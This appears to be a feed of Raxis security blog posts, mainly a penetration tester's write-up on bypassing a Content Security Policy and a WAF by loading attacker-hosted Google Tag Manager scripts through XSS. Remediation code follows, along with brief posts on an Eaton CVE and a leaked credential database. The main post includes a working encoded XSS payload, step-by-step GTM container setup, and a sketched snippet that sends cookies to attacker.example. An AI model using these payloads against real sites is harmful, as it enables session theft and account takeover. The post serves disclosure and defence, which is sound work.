The timeline of this incident reflects a broader shift in the threat landscape. The window between vulnerability disclosure and active exploitation is shrinking, largely due to AI-powered tools that can rapidly generate working exploit code from technical advisories. What once required skilled reverse engineering and days of development can now be accomplished in hours with large language models analyzing CVE descriptions and patch diffs. Organizations must adapt their security strategies to account for this compressed timeline, assuming that any critical vulnerability disclosure will be followed by working exploits and active scanning shortly thereafter.

]]>
Bypassing a WAF and a CSP with Google Tag Manager: An Attacker’s Perspective and Remediation Advice https://raxis.com/blog/bypassing-waf-and-csp-with-google-tag-manager/ Tue, 10 Feb 2026 12:00:00 +0000 https://raxis.com/?p=51832 During several penetration tests last year, I observed that clients often set unsafe CSP directives for Google Tag Manager, usually to supplement data collection via Google Analytics and third-party vendors. 

Aside from the obvious problem of using unsafe directives, this threat was amplified because Google will host attacker-supplied JavaScript on googletagmanager.com. The sections below outline, in practical terms, what a CSP may or may not block. 

My research focused on Google Tag Manager, so I submitted parts of this to Google as part of their bug bounty program. They awarded me an honorable mention and swag, which you can find on their website by searching my name here.

Ryan Chaplin's honorable mention for this Bug Hunters submission.

However, do not think this is limited to Google Tag Manager; if developers use unsafe directives with any platform that allows users to upload or host malicious content, the same exploit will work.

Today I’m going to chat about what I discovered, how it works, and how organizations can remediate the issue. We’ve got a lot to discuss, so here are a few quick links to each section:

  1. CSP Background
  2. Bypassing a CSP with Google Tag Manager
  3. Bypassing a Cloudflare WAF with Google Tag Manager
  4. Remediation Advice

What does a CSP do in practice? 

Content-Security-Policy (CSP) directives protect a site from unwanted content, especially malicious content, and are a fundamental part of web security. 

Consider the intentionally vulnerable JavaScript below, which was implemented on a sample web server and is used throughout this article. The same code appears in every example until the remediation section, where .NET Blazor server configuration and nginx.conf snippets are provided. 

Below is part of a vulnerable web application that trusts user input in the name parameter of the URL, does not sanitize it, and directly appends the input to the body. This is a classic Cross-site Scripting (XSS) vulnerability that we’ll use to demonstrate the power of a CSP:

A vulnerable web application which trusts user input in the name parameter of the URL, does not sanitize it, and directly appends the input to the body.

This developer likely intended to use this for a feature like displaying a user’s name or something similar:

Possibly the developer planned to use this to display a user's name like this.

However, of course, even a novice hacker will find this relatively quickly and realize it is a reflected Cross-site Scripting (XSS) vulnerability:

But it is very easy to perform reflected XSS on that configuration.

A well-defined CSP will prevent this type of attack. Below is an example of a minimal CSP that blocks it. The key directive added here is a nonce, which you can see referenced in the browser's error message when the payload is blocked. A nonce should be a server-generated random value which, when used in a CSP, determines whether a script is allowed to execute. Because the nonce is server generated and unique for each request, the JavaScript in my URL would need to carry a random value I cannot possibly know when sending the request. Since I cannot include the correct nonce in my script, my attack is blocked:

A minimal CSP which causes this attack to be blocked.

Problems Implementing a CSP and Modern Solutions

So why aren’t CSPs more widely implemented? Historically, they were difficult to manage. Because third-party libraries change frequently, organizations needed to incorporate extra steps into their build cycles to generate hashes for third-party scripts. The business complexity of cross-team communication and collaboration for every script on the server further limited adoption. 

Before strict-dynamic became widely implemented, nonce-based and hash-based CSPs had a major limitation: they couldn’t handle dynamically loaded scripts well. This code snippet highlights the issue:

<!-- Your trusted script with a nonce -->
<script nonce="random123">
  // Dynamically created script is BLOCKED by CSP!
  const script = document.createElement('script');
  script.src = 'https://cdn.example.com/library.js';
  document.head.appendChild(script);
</script>

Even though your script was trusted, any scripts it dynamically loaded would be blocked unless:

  • They were explicitly in your CSP allowlist, OR
  • You could add nonces to them, which became nearly impossible for frequently changing third-party scripts.

This made strict CSP policies incompatible with several modern JavaScript frameworks and third-party libraries.

The Solution

Using the strict-dynamic directive propagates trust. If a script is trusted (via nonce or hash), then any scripts it loads are automatically trusted too.

Content-Security-Policy: script-src 'nonce-random123' 'strict-dynamic'

Much of the deployment complexity was fixed with the introduction of the strict-dynamic directive; Safari, the last major browser to adopt it, did so in 2021. The strict-dynamic directive allows additional scripts from a trusted source to load as long as they are loaded via non-"parser-inserted" script elements [source]. In layman’s terms, this means most third-party scripts can be loaded by a source with a nonce, so there's no more generating hashes for each third-party script. 
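
To make the contrast concrete, here is a tiny sketch of my own (function names are illustrative): the only change strict-dynamic requires is in the header itself.

```javascript
// Nonce-only policy: the nonced script runs, but any script it creates
// dynamically is still blocked by the browser.
function cspNonceOnly(nonce) {
  return `script-src 'nonce-${nonce}'`;
}

// Adding 'strict-dynamic' propagates trust: scripts created by a trusted
// (nonced) script via createElement are allowed to load and execute.
function cspStrictDynamic(nonce) {
  return `script-src 'nonce-${nonce}' 'strict-dynamic'`;
}
```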

For example, in Google’s documentation they give great advice on setting a nonce when deploying Google Tag Manager. They even note the hashing option and describe many ways to do this. However, their advice in a copy/paste-able snippet is: 

script-src 'nonce-{SERVER-GENERATED-NONCE}':
Google documentation for setting a nonce.

Let’s look at what happens if we follow Google’s directions blindly. I have set up a nonce and used their nonce-aware version of the script, exactly as described in their documentation:

Following Google's directives above, the XSS is blocked but so is our Custom HTML Tag.

The XSS attack was blocked! The CSP also correctly blocked the inline script. Unfortunately, it did its job a bit too well: features native to Google Tag Manager, like the Custom HTML tag, have stopped loading. 

Note that the error only impacts “Custom HTML” and “Custom JavaScript” loaded through GTM. Google Analytics and likely many other libraries will work at this point. Unfortunately, Custom HTML and Custom JavaScript are frequently required for analytics purposes. In those cases, this CSP may not be acceptable, as that data is often deemed critical to the business. Sometimes it even connects to cookie consent, so it is a legal requirement. 

Surely Google has a solution. Right? The only other instructions (aside from the lone MDN link on nonces) discourage unsafe-inline but immediately give you the exact unsafe directive, where to place it, and even put a star next to it to say, “Certain tags … require the use of additional CSP directives to function properly.” There is no mention of the strict-dynamic directive.

Google's confusing instructions.

Because of this, many enterprises end up with a CSP that is defined but does not require a nonce or a hash. Even worse, many tech bloggers ran with this advice, and now most third-party setup guides for Google Tag Manager outright say to include an unsafe-inline or even an unsafe-eval directive.

However, as soon as an organization adds an unsafe-inline directive without a nonce, malicious actors gain an attack vector. Consider the site below which does not use a nonce and includes an unsafe-inline directive. Perhaps if a novice were to attempt to exploit this, they may naïvely try to include a script tag, see the attack fail, and assume the configuration is safe:

A site which does not use a nonce and includes an unsafe-inline directive.

However, most malicious actors (and even automated scanners) are going to find the shortcut, as simply inlining the script through an image tag results in the same XSS vulnerability:

Inlining the script through an image tag allows the XSS to work.

But that isn’t all! Since there was no nonce, attackers can now use your CSP exemption for Google Tag Manager to perform much more elaborate attacks. 

Imagine this were a typical web application with some eCommerce functionality. A malicious actor might want to target admin users once every session for authentication tokens and on the /admin/logs page to hide evidence. Perhaps they also want to target regular users only on the billing page (to copy their card numbers), and then exfiltrate this data to an external domain. Getting all of that JavaScript to fit in the URL, when IIS rejects URLs longer than 2,048 characters, is possible but comes with negative tradeoffs. It becomes especially difficult when a firewall keeps blocking key parts of your attack. A stealthier approach is to use the existing CSP exemption for googletagmanager.com. This works because, as it turns out, Google will let anyone sign up for and host JavaScript from that domain. 

Bypassing CSP Via Google Tag Manager

This attack is great for bypassing Web Application Firewalls (WAFs) and requires only three prerequisites:

  1. A site vulnerable to injection-based attacks like XSS
  2. A site without a nonce in the CSP for Google Tag Manager
  3. An unsafe directive in the CSP for Google Tag Manager

If you have those three things, the rest is simple. First, sign into any Google account and visit https://tagmanager.google.com/. Select Create Account, and the screen will look like the image below. You can put anything you want in the fields, but we will select a Target Platform of Web for purposes of this demo (since we are hacking my demo web server):

Account on tagmanager.google.com

Click to continue, then configure your tag. If the vulnerable CSP has an unsafe-inline statement, use Custom HTML. If the target application is using unsafe-eval, use Custom JavaScript. If it is doing both, use whichever you feel most comfortable with. We will use Custom HTML. Note this is sandboxed JavaScript, but you can still accomplish everything you need for account takeovers, content injection/manipulation, data theft, and so on:

Configuring your tag

Now just a few more quick things. Every application is different, so the code in this section is only limited by your imagination. Put all the code you want to execute on the target website in this snippet:

Add whatever custom code you like

You will need to add a trigger. If you are familiar with JavaScript, you can think of triggers as onEvent handlers. Many of them function as a thin wrapper around those same handlers. We want it on the default trigger type of Page View for All Pages:

Adding a trigger

After you add a trigger, just publish your changes by pressing submit:

Publish your changes

Now take the GTM-XXXXXXXX value found near the submit button and place it in the id parameter of the URL. For example, googletagmanager.com/gtm.js?id=GTM-TXZ46JJC is the URL I used for this attack. Now you are ready to bypass that CSP using googletagmanager.com.

Below I will use simple JavaScript in the URL to append a script element to the page.

https://vuln.is/csp/?name=%3Cimg%20src=x%20onerror=%22var%20s=document.createElement(%27script%27);%20s.src=%27https://www.googletagmanager.com/gtm.js?id=GTM-TXZ46JJC%27;%20document.head.appendChild(s);%22%3E

Using simple JavaScript in the URL to append a script element to the page.
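
For clarity, here is how that encoded URL is assembled. This is my own reconstruction; the container ID GTM-TXZ46JJC is the demo value from above, and encodeURIComponent escapes a few characters the hand-built URL left bare, which makes no functional difference:

```javascript
// The decoded payload: an <img> whose onerror handler sideloads the
// attacker-controlled GTM container as a new script element.
const payload =
  `<img src=x onerror="var s=document.createElement('script');` +
  ` s.src='https://www.googletagmanager.com/gtm.js?id=GTM-TXZ46JJC';` +
  ` document.head.appendChild(s);">`;

// URL-encode it into the vulnerable name parameter
const attackUrl = 'https://vuln.is/csp/?name=' + encodeURIComponent(payload);
```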

So what happened? A weak CSP policy let an attacker inject an external resource, in this instance a new Google Tag Manager container, that served malicious JavaScript to the site’s users. While this attack only demonstrated a reflected XSS, in many respects a stored XSS works even better with this exploit: the ability to edit your script dynamically, even after you have placed your stored XSS, gives attackers a ton of flexibility. As previously noted, this is also especially powerful against WAFs.

WAF Bypass with Google Tag Manager

In production enterprise environments, it is common to encounter some kind of Web Application Firewall (WAF). If we configured a basic free Cloudflare account and used their free WAF, this attack would still work fine, as that ruleset does not even catch onerror=alert(1).

However, enterprises often invest in firewalls with advanced rulesets containing thousands of rules. Let’s imagine a scenario where the WAF has two redundant rules for catching calls to document.cookie, a common target due to misconfigured cookies that, critically, can lead to privilege escalation during XSS attacks. The first rule removes the word cookie and replaces it with null. You can see in Cloudflare’s Trace tool that it blocks a typical payload attempting to access an authentication token stored in a cookie:

Cloudflare’s Trace tool blocking a typical payload which attempts to access an authentication token stored in a cookie

The second rule also blocks any instances of cookie in URI parameters:

The second rule also blocks any instances of cookie in URI parameters

Of course, these rules will also block it in a browser:

The rule also blocks the attack in browsers

While these are simple rules, you will find variations of them in large production-ready rulesets such as the OWASP Core Rule Set, for example rule 941180, which places document.cookie on the deny list:

Rulesets placing document.cookie on the deny list

Additionally, I have seen this bypass work against generic ASP.NET firewalls as well. The payload is exactly the same as the CSP bypass shown above, and those exact same steps result in code execution. You can see below where my external JavaScript library, hosted on Google Tag Manager, was able to access document.cookie and bypass both the WAF and the CSP:

Ryan's external JavaScript library, hosted on Google Tag Manager, was able to access document.cookie and bypass both the WAF and the CSP.

This works because we are not letting the WAF see our actual JavaScript. It is all being loaded from Google Tag Manager which has an unsafe directive. All of the malicious JavaScript is placed in a Custom HTML tag which is reflectively loaded via XSS.
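
As an illustration of the kind of logic an attacker might place in that Custom HTML tag, here is a hypothetical sketch of my own: attacker.example and buildExfilUrl are invented names, not the payload actually used in this test.

```javascript
// Served from googletagmanager.com, so the WAF never inspects this code --
// only the short loader in the URL ever crosses the WAF.

// Pure helper: package stolen values into a beacon URL
function buildExfilUrl(endpoint, cookie, page) {
  return endpoint +
    '?c=' + encodeURIComponent(cookie) +
    '&p=' + encodeURIComponent(page);
}

// Browser-side usage once the container loads on the victim's page:
// new Image().src = buildExfilUrl(
//   'https://attacker.example/log', document.cookie, location.pathname);
```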

Remediation

First, consider using something other than Google Analytics. I personally use umami.js, and it works great for everything I need; it should cover most small to medium-sized businesses’ needs. You can even self-host it, which is great for businesses that cannot risk a data leak or that face greater regulatory scrutiny. 

Unfortunately, for most organizations it isn’t as simple as switching to another analytics library. So, if your organization is sticking with Google Analytics, you may have noticed I am advocating for strict-dynamic, which allows additional scripts from a trusted source to load as long as they are loaded via non-"parser-inserted" script elements [source]. In our Google Tag Manager-centric case, that means Custom HTML tags will work (even if they include JavaScript); however, Custom JavaScript will not. You can still apply additional workarounds to make Custom JavaScript work, or, alternatively, migrate Custom JavaScript to Custom HTML in the Tag Manager container. 

Deploying a Secure CSP with .NET Blazor App and Google Tag Manager

For a more concrete example, consider this modern .NET 8 Blazor app. In Program.cs I generated my nonce, added it to the request context, and set my CSP with a nonce and the strict-dynamic directive:

// CSP nonce + header middleware (must run early, before StaticFiles)
// Requires: using System.Security.Cryptography; (for RandomNumberGenerator)
app.Use(async (context, next) =>
{
    var nonce = Convert.ToBase64String(RandomNumberGenerator.GetBytes(32));
    context.Items["CSP-Nonce"] = nonce;

    context.Response.OnStarting(() =>
    {
        // Strict CSP compatible with Blazor Server and GTM, no unsafe directives
        var csp = string.Join(" ", new[]
        {
            "default-src 'self';",
            "object-src 'none';",
            "frame-ancestors 'self';",
            // Allow inline scripts only via per-request nonce; allow GTM/GA hosts
            $"script-src 'self' 'nonce-{nonce}' 'strict-dynamic' https://www.googletagmanager.com;",
            // Blazor Server requires WebSockets; allow GA/GTM connect endpoints
            "connect-src 'self' wss: https://www.google-analytics.com https://www.googletagmanager.com;",
            // Images from self, data URLs, and GTM
            "img-src 'self' data: https://www.googletagmanager.com;",
            // Styles via per-request nonce; allow GTM-hosted styles
            $"style-src 'self' 'nonce-{nonce}' https://www.googletagmanager.com;",
        });

        var headerName = app.Environment.IsDevelopment() ? "Content-Security-Policy-Report-Only" : "Content-Security-Policy";
        context.Response.Headers[headerName] = csp;
        return Task.CompletedTask;
    });

    await next();
});

Then, in my App.razor file, I injected the context with the nonce value:

@inject Microsoft.AspNetCore.Http.IHttpContextAccessor HttpContextAccessor
@inject Microsoft.Extensions.Configuration.IConfiguration Configuration
@{
    var nonce = HttpContextAccessor?.HttpContext?.Items["CSP-Nonce"] as string;
    var gtmId = Configuration["GoogleTagManager:ContainerId"];
    bool hasGtm = !string.IsNullOrWhiteSpace(gtmId);
}

In the same App.razor file, I then added the nonce to scripts:

    @if (hasGtm)
    {
        <script nonce="@nonce">
            (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
                    new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
                j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
                'https://www.googletagmanager.com/gtm.js?id='+i+dl;var n=d.querySelector('[nonce]');
                n&&j.setAttribute('nonce',n.nonce||n.getAttribute('nonce'));f.parentNode.insertBefore(j,f);
            })(window,document,'script','dataLayer','@gtmId');
        </script>
        <style nonce="@nonce">
            .gtm-noscript-iframe{display:none;visibility:hidden}
        </style>
    }

    <HeadOutlet/>
</head>

<body>
@if (hasGtm)
{
    <noscript>
        <iframe src="https://www.googletagmanager.com/ns.html?id=@gtmId" height="0" width="0" class="gtm-noscript-iframe" aria-hidden="true"></iframe>
    </noscript>
}
<Routes/>
<script src="_framework/blazor.web.js" nonce="@nonce"></script>
</body>

Lastly, I ensured that I placed the correct Tag Manager ID in my appsettings.json file:

"GoogleTagManager": {
  "ContainerId": "GTM-5HC6NRH3"
},

As long as you place the nonce on all of your scripts (don’t forget the Blazor script), then your page will load with the Custom HTML from Google Tag Manager and malicious actors cannot carry out the attack outlined above.

As long as you placed the nonce on all of your scripts, then your page loads with the Custom HTML from Google Tag Manager and malicious actors cannot carry out the attack outlined above.

Alternatively Deploying a Secure CSP with Nginx and Google Tag Manager

In Nginx, once you have a nonce generation mechanism, simply add the CSP to the desired location in your nginx.conf file:

    location / {
        js_set $nonce csp.nonce; # I used NJS for nonce generation. Modify this to fit your environment.
        add_header Content-Security-Policy "
            default-src 'self';
            script-src 'self' 'nonce-$nonce' 'strict-dynamic' https://www.googletagmanager.com https://www.google-analytics.com;
            object-src 'none';
            img-src 'self';
            connect-src 'self' https://www.google-analytics.com https://www.googletagmanager.com;
        " always;
    }

The Risk of Unsafe Content-Security Policy Directives

The reality is that many enterprises in tightly regulated industries have begun to rein in third-party libraries. This is especially true for major hospitals and healthcare organizations, some of which are paying out tens of millions of dollars due to misconfigured third-party libraries. Even outside of tightly regulated industries, cookie governance has been a major catalyst for increased scrutiny of third-party libraries.

If you are subject to stricter regulations on data, a well-defined CSP not only protects against XSS but can also provide another buffer against unauthorized data transfer from features like enhanced matching and user-data signals, as well as other capabilities in Google’s client-side tracking scripts. 

Recap

A strong Content Security Policy (CSP) is one of the most effective defenses against Cross-site Scripting (XSS). While early CSP implementations were cumbersome, modern features like strict-dynamic make it easier to adopt without compromising on security or breaking core functionality. They are often the first step to creating a well-defined Content Security Policy. 

The trade-off many organizations run into is around integrations like Google Tag Manager (GTM) or Google Analytics, where hasty CSP exemptions (e.g. unsafe-inline) can quietly reintroduce the very risks you were aiming to mitigate. Instead, using per-request nonces and strict-dynamic gives you the ability to safely support necessary third-party scripts without inheriting technical debt, while still guarding against script injection attacks.

The Bottom Line

  • Don’t weaken your CSP by using unsafe-inline or unsafe-eval
  • Favor nonces and strict-dynamic for a balance of security and flexibility
  • Test carefully with your third-party integrations to ensure business needs are met without opening the door to attackers
  • Follow the remediation advice to secure your Nginx or Blazor application’s CSP while using Google Analytics

If you’ve made it this far, thanks for sticking with me! I hope you’ll take a look at other Security Recommendation blogs from the Raxis penetration testing team.

]]>
CVE-2025-59886 Eaton Exploit Code Published https://raxis.com/blog/cve-2025-59886-eaton-exploit-code-published/ Thu, 05 Feb 2026 12:00:00 +0000 https://raxis.com/?p=53114 Last December, Eaton issued an advisory for their xComfort Ethernet Communication Interface (CVE-2025-59886) for a remote code execution/command injection vulnerability. Proof-of-concept exploit code has recently been published on GitHub.

Eaton’s advisory was released on December 22nd; the xComfort ECI product has been discontinued and will no longer receive security updates after November 30th, 2025. If your organization uses these Eaton devices, isolate them to prevent unauthorized access and prioritize upgrading or replacing them with a supported alternative. 

For those of you on internal and external security teams, keep an eye out for Eaton xComfort devices so you can bring attention to these out-of-date products with trivially exploitable vulnerabilities. 

]]>
Publicly Accessible Database Discovered Hosting 149 Million Credentials https://raxis.com/blog/publicly-accessible-database-discovered-hosting-149-million-credentials/ Mon, 02 Feb 2026 12:00:00 +0000 https://raxis.com/?p=52042 A security researcher recently found a publicly accessible database that contained 149 million stolen credentials. The data contained millions of records for Gmail, Facebook and other sensitive services. While they were unable to determine the owner of the data, they did successfully get the hosting provider to remove the service, preventing others from accessing the data further, at least from that location.

While attackers stealing usernames and passwords and distributing them widely is troubling, there are still ways to protect yourself. Use MFA (multi-factor authentication) on all your accounts so that, even if a hacker has your password, they can’t access your account without your approval. Also, don’t reuse passwords across accounts; this limits the impact of a stolen or leaked password, as it will only work for that one site. Password managers are a great tool to make it easy to keep track of many different passwords. If you’re interested in more login security tips, please check out Brad Herring’s recent post about 8-character passwords.

]]>